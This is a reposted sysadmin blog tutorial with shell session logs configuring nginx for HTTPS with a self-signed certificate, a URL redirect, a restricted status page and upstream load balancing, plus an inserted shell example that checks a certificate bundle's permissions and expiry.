-rw-r--r--. 1 root root   2242 Sep 27  2013 Makefile
-rwxr-xr-x. 1 root root    829 Sep 27  2013 renew-dummy-cert
[root@server1 certs]# ll cert.pem 
-rw------- 1 root root 3088 Jul 19 15:31 cert.pem
[root@server1 certs]# mv cert.pem  /usr/local/lnmp/nginx/conf/  ###the nginx configuration refers to the file by a relative path, so move it into the configuration directory###
[root@server1 certs]# cd /usr/local/lnmp/nginx/conf/
[root@server1 conf]# ls
cert.pem                koi-win             scgi_params.default
fastcgi.conf            mime.types          uwsgi_params
fastcgi.conf.default    mime.types.default  uwsgi_params.default
fastcgi_params          nginx.conf          win-utf
fastcgi_params.default  nginx.conf.default
koi-utf                 scgi_params
[root@server1 conf]# vim nginx.conf
[root@server1 conf]# nginx -t
nginx: the configuration file /usr/local/lnmp/nginx/conf/nginx.conf syntax is ok
nginx: configuration file /usr/local/lnmp/nginx/conf/nginx.conf test is successful
[root@server1 conf]# nginx -s reload
[root@server1 conf]# netstat -antlp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address               Foreign Address             State       PID/Program name   
tcp        0      0 0.0.0.0:80                  0.0.0.0:*                   LISTEN      8673/nginx          
tcp        0      0 0.0.0.0:22                  0.0.0.0:*                   LISTEN      900/sshd            
tcp        0      0 127.0.0.1:25                0.0.0.0:*                   LISTEN      976/master          
tcp        0      0 0.0.0.0:443                 0.0.0.0:*                   LISTEN      8673/nginx          
tcp        0      0 172.25.38.1:22              172.25.38.250:39568         ESTABLISHED 1040/sshd           
tcp        0      0 172.25.38.1:22              172.25.38.250:39572         ESTABLISHED 1067/sshd           
tcp        0      0 :::22                       :::*                        LISTEN      900/sshd            
tcp        0      0 ::1:25                      :::*                        LISTEN      976/master          
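
Because cert.pem holds the private key as well as the certificate, its permissions should still be owner-only after the move into the conf directory. The following is an added example, not part of the original notes: shell functions (hypothetical names) that check the bundle's mode and contents and, when openssl is installed, its remaining validity. The sample bundle is a constructed placeholder, not a real key.

```shell
#!/bin/sh
# Added example: sanity checks for a combined key+certificate PEM file such as
# the cert.pem produced by `make cert.pem`.

# Exit 0 when FILE is owner-only and holds exactly one private key and at
# least one certificate; otherwise print one line per finding and exit 1.
check_pem_bundle() (
    f=$1
    rc=0
    if [ ! -f "$f" ]; then
        echo "FAIL $f: not a regular file"
        exit 2
    fi
    # Characters 5-10 of the mode string are the group and other bits.
    perms=$(ls -ldL "$f" | cut -c5-10)
    if [ "$perms" != "------" ]; then
        echo "FAIL $f: group/other bits '$perms' on a file holding a private key"
        rc=1
    fi
    # grep -c exits 1 on a zero count, so neutralise that for `set -e` callers.
    keys=$(grep -c -E -e '^-----BEGIN ([A-Z]+ )?PRIVATE KEY-----' "$f" || true)
    certs=$(grep -c -e '^-----BEGIN CERTIFICATE-----' "$f" || true)
    if [ "$keys" -ne 1 ]; then
        echo "FAIL $f: expected 1 private key, found $keys"
        rc=1
    fi
    if [ "$certs" -lt 1 ]; then
        echo "FAIL $f: no certificate found"
        rc=1
    fi
    [ "$rc" -eq 0 ] && echo "OK   $f: owner-only, 1 key, $certs certificate(s)"
    exit "$rc"
)

# Exit 0 when the first certificate in FILE is still valid DAYS days from now
# (default 30). Uses `openssl x509 -checkend`; exit 3 if openssl is missing.
check_pem_expiry() (
    f=$1
    days=${2:-30}
    command -v openssl >/dev/null 2>&1 || { echo "SKIP openssl not found"; exit 3; }
    if openssl x509 -in "$f" -noout -checkend $((days * 86400)) >/dev/null; then
        echo "OK   $f: valid for more than $days days"
    else
        echo "FAIL $f: expires within $days days (or is unreadable)"
        exit 1
    fi
)

# Constructed placeholder bundle: PEM markers only, no real key material.
write_sample_bundle() {
    printf '%s\n' \
        '-----BEGIN PRIVATE KEY-----' 'AAAA' '-----END PRIVATE KEY-----' '' \
        '-----BEGIN CERTIFICATE-----' 'BBBB' '-----END CERTIFICATE-----' > "$1"
    chmod 600 "$1"
}

demo_dir=$(mktemp -d)
write_sample_bundle "$demo_dir/cert.pem"
check_pem_bundle "$demo_dir/cert.pem"            # mode 600: passes
chmod 644 "$demo_dir/cert.pem"
check_pem_bundle "$demo_dir/cert.pem" || true    # mode 644: reported
rm -rf "$demo_dir"
```

On the server from this page the calls would be `check_pem_bundle /usr/local/lnmp/nginx/conf/cert.pem` and `check_pem_expiry /usr/local/lnmp/nginx/conf/cert.pem 30`; the certificate above was issued with `-days 365`.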



###URL rewriting###
Requests for www.westos.org are rewritten to https://www.westos.org

1 vim /usr/local/lnmp/nginx/conf/nginx.conf
Contents:
 server {
        listen       443 ssl;
        server_name  www.westos.org;

        ssl_certificate      cert.pem;
        ssl_certificate_key  cert.pem;

        ssl_session_cache    shared:SSL:1m;
        ssl_session_timeout  5m;

        ssl_ciphers  HIGH:!aNULL:!MD5;
        ssl_prefer_server_ciphers  on;

        location / {            
            root   /web1;
            index  index.html index.htm;
        }
    }
server  {
        listen       80;
        server_name  www.westos.org;
        rewrite        ^(.*)$ https://www.westos.org$1 permanent;    ###redirects the URL you entered to https://www.westos.org; permanent means a permanent redirect, redirect means a temporary redirect, and $1 carries the requested path under www.westos.org###
     
}
2 nginx  -s   reload

3 vim  /web1/admin/index.html

Contents:
admin  page


Test:
Visit www.westos.org and www.westos.org/admin




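###Monitoring connection counts###

nginx was compiled from source with the --with-http_stub_status_module option; nginx's connection monitoring is provided by that module.

1 vim /usr/local/lnmp/nginx/conf/nginx.conf

Contents: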
server {
        listen       80;
        server_name  localhost;

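 location /status {        ###/status serves the monitoring module that was enabled in the source build####
            stub_status on;
            access_log off;
            allow 172.25.38.2;        ###allow connections from host 172.25.38.2##
            deny  all;            ###deny every host other than 172.25.38.2; allow and deny rules are evaluated in order###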

 }

}

2 nginx -s reload


Test:

Visit http://172.25.38.1/status


Active connections: 1 
server accepts handled requests
 9 9 10 
Reading: 0 Writing: 1 Waiting: 0 


####Load balancing###

1 vim /usr/local/lnmp/nginx/conf/nginx.conf
Contents:
http {
    upstream westos {            ###westos is just a name for the upstream group###
        server 172.25.38.2:80;            ###backend server, port 80###
        server 172.25.38.3:8080;        ###backend server, port 8080###
        server 127.0.0.1:8000 backup;        ###when all backend servers are down, requests go to the local index.html (which says the system is under maintenance...)###
    }

    server {
        listen       80;
        server_name  www.westos.org;
        location / {
            proxy_pass http://westos;    ###round-robin by default###
        }
    }
}


2 vim /var/www/html/index.html

Contents:
System under maintenance...



####Load balancing with a specified weight###
 upstream westos{
        server 172.25.38.2:80  weight=2;    ###send two requests to 172.25.38.2, then one to 172.25.38.3###
        server 172.25.38.3:8080;
        #server 127.0.0.1:8000 backup;

        }


###ip_hash###
Requests from the same source IP are always directed to the same backend server; no weight is needed, and backup is not supported
upstream westos{
        ip_hash;
        server 172.25.38.2:80;
        server 172.25.38.3:8080;
        }



The full session is as follows:
[root@server1 conf]# vim nginx.conf
[root@server1 conf]# nginx -t
nginx: the configuration file /usr/local/lnmp/nginx/conf/nginx.conf syntax is ok
nginx: configuration file /usr/local/lnmp/nginx/conf/nginx.conf test is successful
[root@server1 conf]# nginx -s reload
[root@server1 conf]# vim nginx.conf
[root@server1 conf]# nginx -t
nginx: the configuration file /usr/local/lnmp/nginx/conf/nginx.conf syntax is ok
nginx: configuration file /usr/local/lnmp/nginx/conf/nginx.conf test is successful
[root@server1 conf]# nginx -s reload
[root@server1 conf]# cd /web1/
[root@server1 web1]# ls
index.html
[root@server1 web1]# mkdir admin
[root@server1 web1]# ls
admin  index.html
[root@server1 web1]# cd admin/
[root@server1 admin]# ls
[root@server1 admin]# vim index.html
[root@server1 admin]# vim index.html 
[root@server1 admin]# cd /usr/local/
[root@server1 local]# ls
bin  etc  games  include  lib  lib64  libexec  lnmp  sbin  share  src
[root@server1 local]# cd lnmp/nginx/conf/
[root@server1 conf]# vim nginx.conf
[root@server1 conf]# nginx -t
nginx: the configuration file /usr/local/lnmp/nginx/conf/nginx.conf syntax is ok
nginx: configuration file /usr/local/lnmp/nginx/conf/nginx.conf test is successful
[root@server1 conf]# nginx -s reload
[root@server1 conf]# vim nginx.conf
[root@server1 conf]# nginx -s reload
[root@server1 conf]# vim nginx.conf
[root@server1 conf]# nginx -s reload
[root@server1 conf]# vim nginx.conf
[root@server1 conf]# vim nginx.conf
[root@server1 conf]# vim /etc/httpd/conf/httpd.conf 
[root@server1 conf]# /etc/init.d/httpd restart
Stopping httpd:                                            [FAILED]
Starting httpd: httpd: Could not reliably determine the server's fully qualified domain name, using 172.25.38.1 for ServerName
                                                           [  OK  ]
[root@server1 conf]# /etc/init.d/httpd start
Starting httpd: 
[root@server1 conf]# /etc/init.d/httpd restart
Stopping httpd:                                            [  OK  ]
Starting httpd: httpd: Could not reliably determine the server's fully qualified domain name, using 172.25.38.1 for ServerName
                                                           [  OK  ]
[root@server1 conf]# nginx -s reload
[root@server1 conf]# cd /var/www/html/
[root@server1 html]# ls
class_socket.php  config.php  index.php  purge_action.php  static
[root@server1 html]# rm -fr *
[root@server1 html]# vim /index.html
[root@server1 html]# /etc/init.d/httpd restart
Stopping httpd:                                            [  OK  ]
Starting httpd: httpd: Could not reliably determine the server's fully qualified domain name, using 172.25.38.1 for ServerName
                                                           [  OK  ]
[root@server1 html]# ls
[root@server1 html]# mv /index.html ./
[root@server1 html]# ls
index.html
[root@server1 html]# cd /usr/local/
bin/     games/   lib/     libexec/ sbin/    src/     
etc/     include/ lib64/   lnmp/    share/   
[root@server1 html]# cd /usr/local/lnmp/nginx/conf/
[root@server1 conf]# ls
cert.pem                koi-win             scgi_params.default
fastcgi.conf            mime.types          uwsgi_params
fastcgi.conf.default    mime.types.default  uwsgi_params.default
fastcgi_params          nginx.conf          win-utf
fastcgi_params.default  nginx.conf.default
koi-utf                 scgi_params
[root@server1 conf]# vim nginx.conf
[root@server1 conf]# nginx -s reload
[root@server1 conf]# vim nginx.conf

[root@server1 conf]# nginx -s reload












This article is reposted from blueclo's 51CTO blog. Original link: http://blog.51cto.com/12774272/1949538. To repost it, please contact the original author.




